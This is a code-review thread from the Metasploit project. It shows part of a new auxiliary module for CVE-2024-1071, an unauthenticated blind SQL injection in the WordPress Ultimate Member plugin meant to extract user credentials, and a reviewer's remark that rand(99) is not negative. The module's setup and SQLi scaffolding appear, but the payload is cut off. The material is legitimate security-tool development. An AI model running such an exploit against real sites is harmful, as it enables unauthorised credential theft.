modules/auxiliary/scanner/http/wp_ultimate_member_sorting_sqli.rb

```diff
@@ -0,0 +1,170 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::SQLi
+  include Msf::Auxiliary::Scanner
+  include Msf::Exploit::Remote::HTTP::Wordpress
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'WordPress Ultimate Member SQL Injection (CVE-2024-1071)',
+        'Description' => %q{
+          The Ultimate Member plugin for WordPress up to version 2.8.2 is vulnerable to SQL injection via
+          the 'sorting' parameter. This allows unauthenticated attackers to exploit blind SQL injections and
+          extract sensitive information from the database.
+        },
+        'Author' => [
+          'Christiaan Swiers',  # Vulnerability Discovery
+          'Valentin Lobstein'   # Metasploit Module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2024-1071'],
+          ['URL', 'https://github.com/gbrsh/CVE-2024-1071'],
+          ['URL', 'https://www.wordfence.com/blog/2024/02/2063-bounty-awarded-for-unauthenticated-sql-injection-vulnerability-patched-in-ultimate-member-wordpress-plugin/']
+        ],
+        'Actions' => [
+          ['Extract User Credentials', { 'Description' => 'SQL Injection via sorting parameter' }]
+        ],
+        'DefaultAction' => 'Extract User Credentials',
+        'DefaultOptions' => { 'SqliDelay' => 1, 'VERBOSE' => true },
+        'DisclosureDate' => '2024-02-10',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
+      )
+    )
+
+    register_options [
+      OptInt.new('COUNT', [false, 'Number of rows to retrieve', 1]),
+      OptInt.new('DIR_ID_MIN', [true, 'Minimum value for bruteforcing directory IDs', 1]),
+      OptInt.new('DIR_ID_MAX', [true, 'Maximum value for bruteforcing directory IDs', 100])
+    ]
+  end
+
+  def run_host(ip)
+    print_status("Performing SQL injection for CVE-2024-1071 via the 'sorting' parameter...")
+
+    nonce = get_nonce
+    directory_id = get_directory_id(nonce)
+
+    if nonce && directory_id
+      @sqli = create_sqli(dbms: MySQLi::TimeBasedBlind, opts: { hex_encode_strings: true }) do |payload|
+        random_negative_number = rand(99)
```

Comment:
That's not a negative number :)

Reply:
Fixed https://github.com/rapid7/metasploit-framework/pull/19488/commits/d3d5676ce8ef7250b1a75971b7f58373f1849bdc thanks!